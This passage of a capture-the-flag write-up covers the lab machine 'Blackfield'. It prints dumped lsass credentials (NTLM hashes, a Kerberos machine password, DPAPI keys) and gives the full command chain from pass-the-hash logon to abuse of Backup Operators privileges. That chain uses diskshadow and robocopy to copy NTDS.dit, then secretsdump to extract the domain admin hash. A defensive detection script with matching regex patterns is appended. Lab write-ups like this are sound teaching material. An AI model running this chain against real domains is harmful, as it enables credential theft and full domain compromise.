		Domain: BLACKFIELD.LOCAL
	== WDIGEST [633e3]==
		username svc_backup
		domainname BLACKFIELD
		password None
		password (hex)
	== DPAPI [633e3]==
		luid 406499
		key_guid 836e8326-d136-4b9f-94c7-3353c4e45770
		masterkey 0ab34d5f8cb6ae5ec44a4cb49ff60c8afdf0b465deb9436eebc2fcb1999d5841496c3ffe892b0a6fed6742b1e13a5aab322b6ea50effab71514f3dbeac025bdf
		sha1_masterkey 6efc8aa0abb1f2c19e101fbd9bebfb0979c4a991

== LogonSession ==
authentication_id 366665 (59849)
session_id 2
username DWM-2
domainname Window Manager
logon_server 
logon_time 2020-02-23T17:59:38.293877+00:00
sid S-1-5-90-0-2
luid 366665
	== MSV ==
		Username: DC01$
		Domain: BLACKFIELD
		LM: NA
		NT: b624dc83a27cc29da11d9bf25efea796
		SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
		DPAPI: NA
	== WDIGEST [59849]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.local
		Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
		password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
	== WDIGEST [59849]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)

== LogonSession ==
authentication_id 366649 (59839)
session_id 2
username DWM-2
domainname Window Manager
logon_server 
logon_time 2020-02-23T17:59:38.293877+00:00
sid S-1-5-90-0-2
luid 366649
	== MSV ==
		Username: DC01$
		Domain: BLACKFIELD
		LM: NA
		NT: b624dc83a27cc29da11d9bf25efea796
		SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
		DPAPI: NA
	== WDIGEST [59839]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.local
		Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
		password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
	== WDIGEST [59839]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)

== LogonSession ==
authentication_id 256940 (3ebac)
session_id 0
username DC01$
domainname BLACKFIELD
logon_server 
logon_time 2020-02-23T17:59:13.068835+00:00
sid S-1-5-18
luid 256940
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.LOCAL

== LogonSession ==
authentication_id 136764 (2163c)
session_id 0
username DC01$
domainname BLACKFIELD
logon_server 
logon_time 2020-02-23T17:58:27.052945+00:00
sid S-1-5-18
luid 136764
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.LOCAL

== LogonSession ==
authentication_id 134935 (20f17)
session_id 0
username DC01$
domainname BLACKFIELD
logon_server 
logon_time 2020-02-23T17:58:26.834285+00:00
sid S-1-5-18
luid 134935
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.LOCAL

== LogonSession ==
authentication_id 997 (3e5)
session_id 0
username LOCAL SERVICE
domainname NT AUTHORITY
logon_server 
logon_time 2020-02-23T17:57:47.162285+00:00
sid S-1-5-19
luid 997
	== Kerberos ==
		Username: 
		Domain: 

== LogonSession ==
authentication_id 24405 (5f55)
session_id 0
username UMFD-0
domainname Font Driver Host
logon_server 
logon_time 2020-02-23T17:57:46.569111+00:00
sid S-1-5-96-0-0
luid 24405
	== MSV ==
		Username: DC01$
		Domain: BLACKFIELD
		LM: NA
		NT: b624dc83a27cc29da11d9bf25efea796
		SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
		DPAPI: NA
	== WDIGEST [5f55]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.local
		Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
		password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
	== WDIGEST [5f55]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)

== LogonSession ==
authentication_id 24294 (5ee6)
session_id 0
username UMFD-0
domainname Font Driver Host
logon_server 
logon_time 2020-02-23T17:57:46.554117+00:00
sid S-1-5-96-0-0
luid 24294
	== MSV ==
		Username: DC01$
		Domain: BLACKFIELD
		LM: NA
		NT: b624dc83a27cc29da11d9bf25efea796
		SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
		DPAPI: NA
	== WDIGEST [5ee6]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.local
		Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
		password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
	== WDIGEST [5ee6]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)

== LogonSession ==
authentication_id 24282 (5eda)
session_id 1
username UMFD-1
domainname Font Driver Host
logon_server 
logon_time 2020-02-23T17:57:46.554117+00:00
sid S-1-5-96-0-1
luid 24282
	== MSV ==
		Username: DC01$
		Domain: BLACKFIELD
		LM: NA
		NT: b624dc83a27cc29da11d9bf25efea796
		SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
		DPAPI: NA
	== WDIGEST [5eda]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.local
		Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
		password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
	== WDIGEST [5eda]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)

== LogonSession ==
authentication_id 22028 (560c)
session_id 0
username 
domainname 
logon_server 
logon_time 2020-02-23T17:57:44.959593+00:00
sid None
luid 22028
	== MSV ==
		Username: DC01$
		Domain: BLACKFIELD
		LM: NA
		NT: b624dc83a27cc29da11d9bf25efea796
		SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
		DPAPI: NA

== LogonSession ==
authentication_id 999 (3e7)
session_id 0
username DC01$
domainname BLACKFIELD
logon_server 
logon_time 2020-02-23T17:57:44.913221+00:00
sid S-1-5-18
luid 999
	== WDIGEST [3e7]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: dc01$
		Domain: BLACKFIELD.LOCAL
	== WDIGEST [3e7]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)
	== DPAPI [3e7]==
		luid 999
		key_guid 0f7e926c-c502-4cad-90fa-32b78425b5a9
		masterkey ebbb538876be341ae33e88640e4e1d16c16ad5363c15b0709d3a97e34980ad5085436181f66fa3a0ec122d461676475b24be001736f920cd21637fee13dfc616
		sha1_masterkey ed834662c755c50ef7285d88a4015f9c5d6499cd
	== DPAPI [3e7]==
		luid 999
		key_guid f611f8d0-9510-4a8a-94d7-5054cc85a654
		masterkey 7c874d2a50ea2c4024bd5b24eef4515088cf3fe21f3b9cafd3c81af02fd5ca742015117e7f2675e781ce7775fcde2740ae7207526ce493bdc89d2ae3eb0e02e9
		sha1_masterkey cf1c0b79da85f6c84b96fd7a0a5d7a5265594477
	== DPAPI [3e7]==
		luid 999
		key_guid 31632c55-7a7c-4c51-9065-65469950e94e
		masterkey 825063c43b0ea082e2d3ddf6006a8dcced269f2d34fe4367259a0907d29139b58822349e687c7ea0258633e5b109678e8e2337d76d4e38e390d8b980fb737edb
		sha1_masterkey 6f3e0e7bf68f9a7df07549903888ea87f015bb01
	== DPAPI [3e7]==
		luid 999
		key_guid 7e0da320-072c-4b4a-969f-62087d9f9870
		masterkey 1fe8f550be4948f213e0591eef9d876364246ea108da6dd2af73ff455485a56101067fbc669e99ad9e858f75ae9bd7e8a6b2096407c4541e2b44e67e4e21d8f5
		sha1_masterkey f50955e8b8a7c921fdf9bac7b9a2483a9ac3ceed

Administrator hash

svc_backup hash

Initial Access:

  • Sprayed both NTLM hashes against the DC using crackmapexec; the Administrator hash was rejected, but svc_backup came back green (a valid logon).

crackmapexec smb 10.10.10.192 -u "Administrator" -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62

crackmapexec hash spray

crackmapexec smb 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d

crackmapexec hash spray

  • Used Evil-WinRM to get initial foothold using svc_backup hash and captured the user flag.

evil-winrm.rb -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d

got shell via evil-winrm

user flag

  • I was able to peek inside the Administrator home directory but could not read the root flag.

Administrator home directory

cannot read root.txt

  • Next, I checked the privileges of our current user and found an interesting one enabled – SeBackupPrivilege.

whoami /all

checking user privileges and groups

  • Also looked inside a notes.txt file in the C: directory, which reveals some hints about a backup being performed.

notes.txt

  • Looked into the account information for user svc_backup and found that it is part of the “Backup Operators” group. With SeBackupPrivilege enabled and the user being a member of Backup Operators, we can escalate our privileges by taking a backup of the SAM or NTDS.dit file and then dumping password hashes from it. So, let’s perform it then.

net user svc_backup

Backup Operators group found

Privilege Escalation:

  • Made a directory named Temp and used reg save to export the SAM and SYSTEM registry hives into it.

cd Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system

saving sam and system files

  • Downloaded the files to our local machine. This might take a while.

downloading sam and system files

  • Used pypykatz to parse the SAM and SYSTEM hives offline and recovered the local account hashes.

pypykatz registry --sam sam system

dumping creds using pypykatz

  • I tried to get a shell as Administrator with the dumped hash but got denied. The SAM only holds local accounts, so the domain Administrator’s hash has to come from the NTDS.dit file instead.

unable to get shell

  • Saved the commands below to a file named diskshadow.txt. They tell diskshadow to create a persistent shadow copy of the C: volume (no writers involved) and expose it as drive Z:, which gives us a readable copy of files that are otherwise locked, such as NTDS.dit.

echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
echo "create" | out-file ./diskshadow.txt -encoding ascii -append        
echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append

creating diskshadow.txt

diskshadow.exe /s c:\temp\diskshadow.txt

executing diskshadow

  • Next, used the robocopy utility to copy NTDS.dit from the exposed Z: drive (the shadow copy of C:) into our temp directory. The /b switch runs robocopy in backup mode, which is what lets SeBackupPrivilege bypass the file’s ACL.

cd Z:
cd windows
cd ntds
robocopy /b .\ C:\temp NTDS.dit

robocopy the NTDS.dit file

  • Also saved a copy of the SYSTEM hive as system.bak in our temp directory; it holds the boot key needed to decrypt the secrets in NTDS.dit.

cd C:\Temp
reg.exe save hklm\system C:\temp\system.bak

saving system file

  • Downloaded both files to our local machine. This might take a lot of time, so go ahead and have some Kool-Aid.

downloading ntds.dit and system.bak

  • Once downloaded, used secretsdump.py with the NTDS.dit file and the SYSTEM hive to extract the domain hashes, which gave us the Administrator’s NTLM hash.

secretsdump.py -ntds ntds.dit -system system.bak LOCAL > hashes.txt

dumping hashes with secretsdump

  • At last, used Evil-WinRM to get shell access as administrator and captured the root flag.

evil-winrm.rb -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee

got root and root flag
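The chain above (a logon that holds SeBackupPrivilege, followed by reg save of SAM/SYSTEM, diskshadow and robocopy /b against NTDS.dit) is also what a defender should look for. The following is an added detection example, not part of the walkthrough: it correlates Security log events 4672 (special privileges assigned to a new logon) and 4688 (process creation) by Logon ID. The event dicts, their field names and the expected-account list are constructed assumptions.

```python
"""Flag Backup Operators abuse: a logon granted SeBackupPrivilege that then runs
the commands seen in the walkthrough. Added example; events are constructed
dicts mirroring a few Security log 4672/4688 fields (field names assumed)."""
import re

# Accounts expected to hold SeBackupPrivilege (hypothetical backup agent).
EXPECTED_BACKUP_ACCOUNTS = {"BLACKFIELD\\backup-agent$"}

# Command-line patterns matching the privilege-escalation steps above.
SUSPICIOUS_CMDLINES = [
    re.compile(r"diskshadow(\.exe)?\s", re.I),
    re.compile(r"reg(\.exe)?\s+save\s+hklm\\(sam|system)", re.I),
    re.compile(r"robocopy(\.exe)?\b.*\s/b\b", re.I),
    re.compile(r"ntds\.dit", re.I),
]


def find_backup_abuse(events):
    """Return (account, logon_id, cmdline) for every suspicious process whose
    logon session was earlier granted SeBackupPrivilege by an unexpected account."""
    privileged = {}  # logon_id -> account that received SeBackupPrivilege
    hits = []
    for ev in events:  # assumed to be in chronological order
        if ev["EventID"] == 4672 and "SeBackupPrivilege" in ev["Privileges"]:
            account = f'{ev["AccountDomain"]}\\{ev["AccountName"]}'
            if account not in EXPECTED_BACKUP_ACCOUNTS:
                privileged[ev["LogonId"]] = account
        elif ev["EventID"] == 4688 and ev["LogonId"] in privileged:
            cmd = ev["CommandLine"]
            if any(p.search(cmd) for p in SUSPICIOUS_CMDLINES):
                hits.append((privileged[ev["LogonId"]], ev["LogonId"], cmd))
    return hits


# Constructed sample: svc_backup's WinRM logon and the commands run above,
# plus a legitimate backup agent and an unrelated session that must not fire.
SAMPLE_EVENTS = [
    {"EventID": 4672, "AccountDomain": "BLACKFIELD", "AccountName": "svc_backup",
     "LogonId": "0x5f4c2", "Privileges": ["SeBackupPrivilege", "SeRestorePrivilege"]},
    {"EventID": 4688, "LogonId": "0x5f4c2", "CommandLine": "reg save hklm\\sam c:\\Temp\\sam"},
    {"EventID": 4688, "LogonId": "0x5f4c2", "CommandLine": "whoami /all"},
    {"EventID": 4688, "LogonId": "0x5f4c2", "CommandLine": "diskshadow.exe /s c:\\temp\\diskshadow.txt"},
    {"EventID": 4688, "LogonId": "0x5f4c2", "CommandLine": "robocopy /b .\\ C:\\temp NTDS.dit"},
    {"EventID": 4672, "AccountDomain": "BLACKFIELD", "AccountName": "backup-agent$",
     "LogonId": "0x60a11", "Privileges": ["SeBackupPrivilege"]},
    {"EventID": 4688, "LogonId": "0x60a11", "CommandLine": "diskshadow.exe /s scheduled.txt"},
    {"EventID": 4688, "LogonId": "0x71b00", "CommandLine": "reg save hklm\\system x"},
]

if __name__ == "__main__":
    for account, logon_id, cmd in find_backup_abuse(SAMPLE_EVENTS):
        print(f"{account} ({logon_id}): {cmd}")
```

Event 4688 only carries the command line when the “Include command line in process creation events” policy is enabled; without it, fall back to matching on the new process name alone.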

machine completed


Conclusion:


So that was “Blackfield” for you. This machine covers exploitation of Windows and Active Directory misconfigurations. Initially, Anonymous / Guest access to an SMB share was used to enumerate users. Once a user was found to have Kerberos pre-authentication disabled, we conducted an ASREPRoasting attack. This allowed us to retrieve a hash of the encrypted material contained in the AS-REP, which was then cracked via an offline brute-force attack. With this user’s creds, we accessed an SMB share containing forensics artefacts, including an lsass process dump. This contained a username and password for a user with WinRM privileges, who is also a member of the Backup Operators group. The privileges conferred by this group were then used to dump the Active Directory database and retrieve the hash of the primary domain administrator. On that note, I will take your leave and will meet you in the next one. Till then, “Happy hacking”.
